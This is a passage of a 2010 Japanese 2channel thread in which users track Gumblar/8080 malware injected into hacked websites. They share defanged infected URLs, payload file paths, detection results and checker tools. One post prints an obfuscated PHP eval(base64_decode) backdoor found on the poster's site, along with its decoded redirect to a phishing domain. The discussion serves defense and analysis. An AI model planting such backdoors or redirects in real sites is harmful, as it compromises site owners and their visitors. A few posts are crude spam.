59 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 09:29:30 ]: >>44
マスターパスワードを設定するとパスワードが抜かれないの？
60 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 10:17:17 ]: 同人スレから流れ込んで来るならもうちょっとさあ
61 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 11:50:36 ]: 毎度。
www●f-curtain●jp

Gumbler.xとGumbler:8080の複合型っぽい。
Bodyタグの前に難読化されたスクリプトが挿入されてる。
62 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 11:56:09 ]: やっぱさー
>>61とか新型亜種ってfile.exeがおかしくない？
これ感染してくんない・・・
63 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 12:14:51 ]: VMでやろうとしてね?
解析避けのケチケチ機能が前より強化されてる気がする
64 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 12:21:25 ]: >>61
純粋な8080だよ。
main/main.htm は従来通りの場所に全く同じのが仕込まれてる。
トップは</head>の前に入れてるけどgumblar.xは</head>の後。
トップだけ変なとこに入っているのとscriptタグ含めて大文字になっていることから
ホームページビルダーか何かの余計なお世話機能でそうなったんだと思う。
65 名前：名無しさん＠お腹いっぱい。 [2010/02/08(月) 12:21:29 ]: >>27
カラー設定の8080表記を誤検出してない？
Kaspersky ESET aviraで検出してないんだけど
66 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 12:22:07 ]: 実機にクリーンインストールしてもダメだった
xpsp1、ie6、flash 8.x、adobe reader 7.x、jre 6u10

file.exeのDLまではうまく動いてるが、file.exe実行でPCが落ちて自動リブート
リブート後も何も起こらず感染の気配なし
ちなみにVM上でもまったく同じ症状
67 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 12:55:44 ]: >>64
どうもです。
そういえば中途半端なところにタグ挿入されてソース丸見えだったり
scriptがちゃんと動作してない改ざんサイトもあったね…。

あれも余計なお世話機能が働いてたのかもなぁ…。
68 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 15:06:26 ]: 8080系で、

<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/

のどのコメントもない（いきなり難読化したJSコードが書いてある）ものを見かけました。
69 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 15:12:59 ]: チェッカー系って難読化したんじゃなくてそのGPLだかのワード探してるだけなのか
70 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 15:51:35 ]: >>68
既出
71 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 16:09:40 BE:1572825-2BP(1236)]: >>61
めるぽしました。
72 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 17:17:58 ]: >>61は新聞にも載ったのにまた随分と放置しまくりだな
73 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 17:25:22 ]: >>71
乙です。

>>72
新聞に載ったのかｗ
再発したんだろうなぁ
74 名前：名無しさん＠お腹いっぱい。 [2010/02/08(月) 17:42:33 ]: Last-Modified: Mon, 08 Feb 2010 02:14:39 GMT
だし再感染だろう
75 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 18:43:40 ]: Gumblar.X Checkerのパターンを更新しました。
gumblar.s1.dynamitelife.net/gumx/
76 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 19:42:13 ]: >>75
乙です
77 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 22:13:49 ]: Gumblar.Xって本格的に活動再開なの？
78 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/08(月) 22:15:33 ]: いみが
79 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 09:31:44 ]: ネットラジオ聴いててリンク踏んだらノートンが反応したのですが

tokyo●cool●ne●jp
80 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 10:39:17 ]: GumblarChecker 2がFirefox3.6で、適当なURLを調べると上の方に
Notice: Undefined index: src in /home/gumblar/public_html/index.php on line 505
とか出るな。
81 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 14:55:53 ]: >>80
Firefoxだけじゃないだろ。
IEもOperaもChromeもSafariもみんな出るじゃん。
82 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 16:39:10 ]: >>80
それは特に気にしなくてもいいメッセージですが、
とりあえず非表示にしました。
83 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 18:56:41 ]: //www●pinfu●info/blog/hukurahagi/

新コードテスト中？
84 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:06:57 ]: >>83
Last-Modified: Mon, 08 Feb 2010 20:10:30 GMT
昨日か
85 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:08:25 ]: >>84
いや、GMTだから日本時間だと午前5時だね
86 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:10:14 ]: //www●hondasanken●com/newhonda/lofty_suwano/index.html
これも
Last-Modified: Mon, 08 Feb 2010 20:03:22 GMT
87 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:21:16 ]: しばらく新種が来ないなと思ったら超新型開発中だったのかｗ
かなり偽装に手が込んでるなぁ
88 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:25:17 ]: 特徴なのはタグの途中で挿入されてることかな？
LGPLとかDEBUGとかのように</body>直前で挿入されてることはなく
89 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:38:51 ]: >>88
スクリプト自体がものすごく変わってる。もちろん検出０。Dr.Webもだめぽ
ttp://www.virustotal.com/analisis/fd0832062361e6d55516349cc2c81c4d0b5128d15d2041554aafed7fe04de690-1265711253

ポート8080なのは変わってないけど
90 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:46:10 ]: こちらの環境では肝心のブツが落ちてこない…
91 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:48:21 ]: こういう時に限ってWepanetメンテナンスだしねえ
92 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:49:04 ]: >>86
サイト落ちてる？
93 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:50:11 ]: いや、つながるよ
94 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 19:55:47 ]: >>93
さんくす。
>>92のときはつながらなかった。

んでwww●hondasanken●comは全体っぽい。
ぐぐるきゃっしゅは無印8080　＞ 30 Jan 2010 13:50:00 GMT
95 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 20:01:37 ]: 8080系がコードを更新中･･･
tp://www●i-paradise5●jp/~simple/otona/index●php

※明日以降なら↓で釣れそうな予感
"<script>var" ";this.go" "document;this." ".replace(/["
96 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 20:04:15 ]: 落ちてこない。変わったの？
:8080/pics/win.jpg
:8080/pics/JavaGame.jar
:8080/pics/ChangeLog.pdf
97 名前：名無しさん＠お腹いっぱい。 [2010/02/09(火) 20:09:13 ]: ドメインは準備中かな？
98 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 20:10:47 ]: いや、違うか
99 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 20:29:02 ]: うーん、鯖は生きてるみたいだけどねぇ
どうなんだろ
100 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 21:02:11 ]: 鯖にアクセスできないぞゴラァ
ウイルスマダー！？
101 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 21:02:52 ]: 鯖煮食った
102 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 21:53:33 ]: 鯖缶のスレを見つけてそこのレシピを見たら気になってこれから作ってみる
103 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/09(火) 22:40:56 BE:11318898-2BP(1236)]: >>83
ろりぽ
>>86
めるぽ
>>95
whois上流めるぽ
株式会社エヌ・ティ・ティピー・シーコミュニケーションズ (NTT PC Communications,Inc.)

改竄されてはいるので。。。
104 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 01:18:50 ]: >>103 乙！

>>95のスクリプトを投げてみた
www.virustotal.com/analisis/a253e223b622a43297db3b492df1b88407d0011fae035f9593ec9765558b73ca-1265731900
Result：1/41 (2.44%)
Sophos：Troj/JSRedir-AR

( ´・ω・｀)・・・
105 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 01:50:21 ]: www●cory●ne●jp/koujirireki/index●htm

２つ入り
www●homemate-trusty●com/lent/

古いの
www●e-robin●com/recruit/index●html

aguseで見ると.ruの国名がFRになっているんだけど
どういうことだろう？
106 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 01:51:38 ]: 二輪駆動ってことだ
107 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 01:52:17 ]: そういうことだよ
108 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 01:56:41 ]: DEになってるときもあったな
109 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 02:05:22 ]: 国別ドメインのカントリーコードとサーバがある国は関係ない。

slickdeals-net●alimama●com●imageshack-us●recentmexico●ru
→ 94.23.199.154 FR
→ 188.40.118.68 DE
→ 78.41.156.236 GB
→ 85.25.152.241 DE
→ 91.121.112.227 FR
110 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 04:34:42 BE:2515744-2BP(1236)]: >>105
めるぽしました。
whoisからめるぽ。
めるぽしました。

しましましほ。
111 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 07:44:01 ]: マスターペニス
112 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 10:02:13 ]: >>104
相変わらずadobeの脆弱性をつくものなのですか？
113 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 10:11:37 ]: >>112
javascriptがかわっただけでDLされるプログラムは変わってなかった
環境とかによってDLされるプログラムが変わるだろうけど

とりあえず俺の環境だと相変わらず感染もしなかった・・・
file.exeうまく動かないってこれｗ
114 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 10:13:33 ]: >>105の２つ入りのやつの２つは<script>varじゃなくて<script>thisなんだね。
今回はいろんなパターンがあるな。
115 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 10:16:36 ]: こまけえな
116 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 10:23:34 ]: >>113
ありがとう
117 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 10:37:09 ]: いつもの人の記事
「Gumblar.8080」の改ざんコード、規則性が崩れて複数に分裂
ttp://blogs.yahoo.co.jp/noooo_spam/59507906.html

>『/*GNU GPL*/』『/*LGPL*/』『/*Exception*/』という特徴的な目印（コメント文）、そして直近のものだと目印がないながらもコードにいちおう規則性があったんですが、今回からコードが複数に分裂してサイトごとにほとんどバラバラな感じ。

で、アクセス制御に関して他の人の記事。非常に面倒くさい仕様になっている模様…
インジェクション 8080のアクセス制御？
jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=%A5%A4%A5%F3%A5%B8%A5%A7%A5%AF%A5%B7%A5%E7%A5%F3+8080%A4%CE%A5%A2%A5%AF%A5%BB%A5%B9%C0%A9%B8%E6%A1%A9

>同一IPアドレスで数日後にアクセスしないとコンテンツ（＝検体）がダウンロードできない
118 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 10:39:46 ]: >>117
その記事は確認済みだけど、確かにその挙動の時もあったけど
必ずしもそうじゃない時もあるんだよね

ほんとよくわからんｗ
119 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 10:46:48 ]: こんだけスクリプト自体も変更してるんだから、アクセス制御なり他の挙動もコロコロ変わってるんだろうねぇ。本体以外は

ホント憎たらしい程に頭良いな、このマルウェアの作者ｗ
たまに本気でデバック段階のコードじゃないのっていうスクリプトを流したりお茶目なことしてくれるけどさ
120 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 11:04:05 ]: 頭いいとは思うけど、才能の無駄遣いだよなぁ…
121 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 11:06:24 ]: まだ金とか物理的な被害ってないのかな？
122 名前：名無しさん＠お腹いっぱい。 mailto:sage ぬるぽ [2010/02/10(水) 11:09:34 ]: >>120
随分と大規模な才能の無駄遣いだよな
123 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 11:34:00 ]: >>120
こういう人がセキュリティ会社に入ってソフト作ってほしいよな。
高給で雇わないかなぁ。
124 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 11:44:22 ]: allabout●co●jp/gm/gc/7236/

チェッカーに引っかかったのだが
125 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 11:51:13 ]: >>124
親子丼とか見せんじゃねー
一気に腹へっちまったじゃねーかｗｗ
126 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 12:01:23 ]: ノートンがRapid Releaseで対応してきた
127 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 12:16:34 ]: >>123
コードの難読化自体はそんなに難しいことではない
それでもこの作者はかなりやり手だけど

キラよりもＬの方が立場は厳しい
128 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 12:19:12 ]: こんなのやってるのは底辺だろ
129 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 12:43:58 ]: それにしても急に感染広まったのって何故？
プログラムの中身の変化にあまり関係なくみたいだが。
130 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 12:51:59 ]: 感染原因になるプログラムの更新をしてない鯖管がそれだけ多いってことじゃね？
感染してftpパス抜かれても改ざんが目に見えない箇所だから
めるぽとかされなきゃ気づかないんだろう
131 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 13:06:18 ]: >>130
詳細な動作検証をしないとパッチを当てられないポリシーのところが多い
汎用機時代の考えから抜けられないバカ情シスのせい

パッチをあてなきゃ
↓
でも検証しなきゃ当てられない
↓
検証しなきゃ
↓
予算がない
↓
パッチあてられないね
↓
ウイルスにやられたウギャー
132 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 13:15:41 ]: MSパッチでてるね
133 名前：名無しさん＠お腹いっぱい。 [2010/02/10(水) 18:32:38 ]: スクリプトも変化してるが、
最後のfile.exeなんかほぼ常時、
アンチウィルスソフトでは引っかからない状態なんだけど
まさか落として来て実行されるなんてことはないよな？
134 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 18:35:05 ]: そのウイルス対策ソフトがダメなんじゃないの？
135 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 18:35:12 ]: ほぅ‥‥‥
ttp://blog.f-secure.jp/archives/50347548.html
136 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 18:38:44 ]: >>135
ありゃ
これは完全に日本人狙ってるね
137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 18:46:20 ]: 年賀状PDFか
138 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 18:46:33 ]: ネットワークの脅威の改善、これはネットワーカーの責務です。
ガンブラーはネットワークの脅威です。

さて、ネットワーク上からガンブラーを消し去って
ネットワークの脅威はなくなるのでしょうか。

ネットワークの脅威とは何なのでしょうか。
マシンを管理出来ない方、HPを管理出来ない方
彼等もまたネットワークの脅威なのかも知れません。

ガンブラー仕掛け人に問います。
貴方達のしている事、それは
ネットワーカーとして胸を張れる事なのかと。。。
139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 18:50:27 ]: ウイルスは作品だろ
140 名前：名無しさん＠お腹いっぱい。 [2010/02/10(水) 18:51:10 ]: >>134
どこのウィルスソフトでも変らんよ。
今拾って来たfile.exeに反応するのはSymantecとTrendMicroだけだし。
このfile.exeもまた明日になれば変わる。
また数社が検出するか、全く検出しないかで、
また次の日が来ればfile.exeは変わる。
その繰り返し。
141 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 18:52:08 ]: 穴ふさいどけそんだけ
142 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 19:16:29 ]: avastも一気に3パターンくらい追加したらしい
JS:IllredirがIまで来てる(俺が確認したのはFまでだった)

www.virustotal.com/analisis/c96ccbf597a97696531b54a62218335939d6dd1afa874cf0e3e7a413415bb6b2-1265795916
143 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 19:33:03 ]: ウィルス？
ウィルスソフト？

ｗｗｗ
144 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 19:39:30 ]: つか、もうアンチウイルスソフトベンダー各社は :8080/ を含むアドレスのアクセスの一時遮断と
警告メッセージを出すようなフィルタの標準装備を考えた方がいいんじゃね？
145 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 19:40:30 ]: そんなのすぐに対処されるからほとんど意味ない
146 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 19:54:57 ]: プロバイダだけどbiglobeは海外からのftp接続を遮断するってさ
147 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 20:03:41 ]: しかしここまで面倒なことになるとはなぁ
迷惑だが、このウィルス作り出したヤツは凄いとも思うわ
穴ふさぎしていても、一抹の不安はあるわ
148 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 20:18:20 ]: 下手人は日本人ですか？
149 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 20:31:24 ]: >>146
こりか。
homepage.biglobe.ne.jp/information/ftpaccess.html
150 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 20:36:08 ]: >>146
BIGLOBEは海外からFTPで接続して改ざんされてると思ってるのかな…
その可能性もあるけど、海外からの接続遮断しても改ざんされてたら
第三者の仕業じゃないって証明にもなるな
151 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 20:37:51 ]: 時間稼ぎにはなるとは思うが
今度は国内のボットネット感染PCを使って広めたりしそうだな
だがmeshユーザーとしては有難い処置だ
152 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 20:41:16 ]: >>150
そのへんはログ見て判断したんだろ
さすがに想像だけで行動するほどバカじゃないはず
153 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 20:51:04 ]: 効果のほどはやってみないとわからないとしても、ISPの側から対策に乗り出した姿勢は評価。
サイト主の自己管理に任せていてもらちがあかないのは確かなんだし。
154 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 20:52:00 ]: >>150
ユーザー自身によるFTPアクセス制限の開放・遮断を行う機能も追加する予定らしいし
ユーザーがしっかり対処すれば、FTPパスを盗んだだけじゃまず改変できなくなるだろう
155 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:01:56 ]: 海外サイトでのGumblar感染はあまり聞かないね
ここまで晒されてるURLは日本のサイトがほとんどだし
156 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:07:30 ]: アホなこと言うなよ日本だけのわけないだろ
157 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:11:41 ]: >>155
海外のサイトだとほとんど反応ないよな。
158 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:16:09 ]: またアホが
159 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:20:54 ]: 海外は確かに少ないね

ニュースになるだけで
ふ～ん　そっか～　見たいな感じ
160 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:23:37 ]: 海外のサイト見ないからだろ
一人で必死に嘘言うなよ
161 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:25:53 ]: 複数のFTPクライアントのなかにFFFTPが含まれてたり
様々なサイト名のなかに日本のサイトが含まれてるだけで
日本を攻撃してるなんて言ってるアホもいるからな
そう言うのを信じるやつもいるから
いい加減な嘘はやめれ
162 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:28:37 ]: >>135は開いても大丈夫なの？
163 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:37:38 ]: >>160
ん？お前なに必死になってんの？
海外サイト見てるんだぜ
すごいぜとでもいいたいの？
ばかじゃねーの？ｗｗ
164 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:40:51 ]: ロシアの地震予知サイトが2度攻撃受けてるがな
165 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:41:30 ]: ほんとなら　【　感　染　し　て　い　る　！　】　海　外　サ　イ　ト　　の　U　R　L　
張って欲しいな
166 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:42:28 ]: gumblar.s1.dynamitelife.net/ver3/
新型用のGumblar Checker 3を公開しました。
そのうち旧型にも対応します。
167 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:53:31 ]: >>165
自分で探せよ
当たり前だがあるから
168 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 21:54:23 ]: このスレもずいぶん馬鹿が増えて来たな
169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:00:19 ]: >>162
えっ
170 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:10:16 ]: >>166
乙
171 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:11:08 ]: 馬鹿が多いスレですね
172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:12:18 ]: >>167
自分で探せ？
探さなくちゃ出てこないの？
馬鹿が多いね
173 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:18:16 ]: 馬鹿でもなんでもいいから、海外のサイトのURL貼って欲しい
もちろんドットを●に置き換えて
174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:18:54 ]: つ//www●vrsgroup●com/index.html
/*CODE1*/
175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:25:02 ]: 新型（海外）
//www●elmwoodguestcottage●com/
176 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:27:44 ]: ゲーム系サイトは大丈夫・・・かな
177 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:32:51 ]: //ggpurasu●com/PS2/
ここならやられてた
178 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:41:49 ]: いちいち挑発にのるなよ
バカを相手にしても疲れるだけだよ
179 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:46:27 ]: 珍しく荒れてる理由は↓これに尽きるなｗ

541 ：名無しさん＠お腹いっぱい。：2010/02/10(水) 20:16:53
そろそろあほ大学の入試が終わる時期だな
180 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:49:44 ]: こんだけなの？
すくねｗｗｗｗｗｗｗｗｗ
腹痛くてげっぷでそうｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
181 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:50:42 ]: >>178
馬鹿？
お前ウイルス相手に疲れないの？ｗｗ
182 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:52:24 ]: >>180
これだけじゃないよ
米Yahoo使うとかなり出るから検索しろ
183 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 22:54:28 ]: >>182
わかったわかった。
じゃあな
184 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 23:05:10 ]: 悪意をもってＰ２Ｐのスレにリンク貼ってる奴がいるのは、確か。
185 名前：名無しさん＠お腹いっぱい。 [2010/02/10(水) 23:14:57 ]: だんだん検索で
新型のスクリプト探すの難しくなって来たな。
186 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/10(水) 23:22:25 ]: >>177
よく見たら新型orz
ttp://www.virustotal.com/analisis/75b1f7d9112a655ab5164d3e3bcad83026dd11c78f0f758188e654c29469c3da-1265811542
0/40
187 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 00:03:42 ]: ここも新型
www●mfreep●com
188 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 00:05:10 ]: >>186
んーなもん、最後のfile.exe落とすまでほとんど検出されんぞ。
穴ふさいで、ゼロデイ来ないの祈る他無い。

神頼みだぞ。
189 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 00:11:46 ]: >>188
落として検出されることを願おう

>>187
新型ではあるが昨日にはもう出てた
各社対応が進み始めてる(avastに怒られたよ)
190 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 00:18:55 ]: 今まではjpドメインばっかり見ていたんで
ほかをちょっと見てみた。

us、uk、de、ruはありそうだけど、cnが見つからない...
191 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 01:09:21 ]: 相変わらず早い･･･
・サイト改ざん～「8080」「Gumblar.x」に変化、サイト管理者の方は注意を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2150

「iframes are EVIL! Hate Zeus!」
陥落サイトの奪い合い再発の予感がw
192 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 02:14:52 BE:5030584-2BP(1236)]: >>177
またろりぽ。

>>187
めるぽ。念のためでじろにもつーほー。
193 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 02:36:07 ]: マスターペニス
194 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 02:52:49 ]: やべーやられた

まず始めに環境
XPSP3 Firefox3.6 NoscriptでJavascript常時無効
Flashplayer10,0,42,34
AdobeReader未インストール（PDFX-change viewer 2.0 build0.45）
Java Runtime Environment6.0 build18
QuickTime未インストール、RealPlayer未インストール
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに疑わしきプログラムは無し

自サイトをftpで更新しようと思ったらdbフォルダに（ランダムな英数字文字列）.phpが生成されてた。

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4apY2FsbF9PT0nYmdZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2CRfUE9TVFsnZSddKSk7')); ?>

中身を見るとこんな感じのbase64で記述されていた。（↑の中身は例）
これを変換すると以下の内容が書かれたファイルが生成された。（xはランダムな数字。ここでは伏せる）

$axxxxxxxx=xxxxxx; if($_SERVER["HTTP_USER_AGENT"] != "asdfhgysrtgh") header("Location: heartearly.com/?said=c5"); else print "rysdty"."jstyah"; $bxxxxxxxx=xxxxxx;

以下にも怪しいheartearly.comを調べるとフィッシングサイトだった
www.siteadvisor.com/sites/heartearly.com/postid/?p=2765765

FTPに生成されていたのはこの（ランダムな英数字文字列）.phpだけで、
サイト本体のindex.phpにこのファイルを呼び出すタグは幸い埋め込まれていなかったので自分や第三者に影響はなかった。

自分が感染した形跡もないし原因はいったい何だったのか全くわからん
195 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 03:59:51 ]: 原因は慢心だな。
これなら大丈夫という思い込みが
手動で調べるという作業を怠らせた。
その結果がこれだ。
196 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 04:53:27 ]: >>194
同じかどうかわからないけど
去年の11月にあったGumblar.xのときは
その騒動が始まる前からWordPressとかでそういう改ざん騒ぎがあったはず。
サイトに使われているソフトが古くてその脆弱性を突かれたとか。
takahashifumiki■com/web/programing/717/

他のサイトにそのPHPファイルのURLが埋め込まれてウィルスばらまくのに使われてたんだろう。
トップにウィルス埋め込んでないと発覚が遅くなるということなのかも。
197 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 05:03:41 ]: AdobeがFlash Playerの脆弱性を放置、責任者が「過ち」を認める
www.itmedia.co.jp/enterprise/articles/1002/09/news020.html

Flash Playerにクラッシュの脆弱性情報があるとの情報は2008年9月に寄せられたが、
修正は次のリリースに先送りされた。
198 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 05:09:18 ]: マスターペニス
199 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 07:01:28 ]: >>197
このクソ会社潰れてくれねーかな？マジでいらねーだろ。
200 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 07:28:59 ]: >Flash Player 10.1の安定版は「近いうちに」リリースする予定。
いつになるんだろ・・・・・・・
201 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 07:52:56 ]: Flash Player　窓から投げ捨てたい
202 名前：名無しさん＠お腹いっぱい。 [2010/02/11(木) 07:59:52 ]: しかしこいつだけまともな代替案が無い罠
203 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/11(木) 08:21:11 ]: だからHTML5を早急に！
っていつまともな状態になるのかも分からんし、Flash一掃する程のモノかと言うと…
PDFも企業・お役所で根強いしなぁ

結局はAdobeに振り回される日々はまだまだ続く
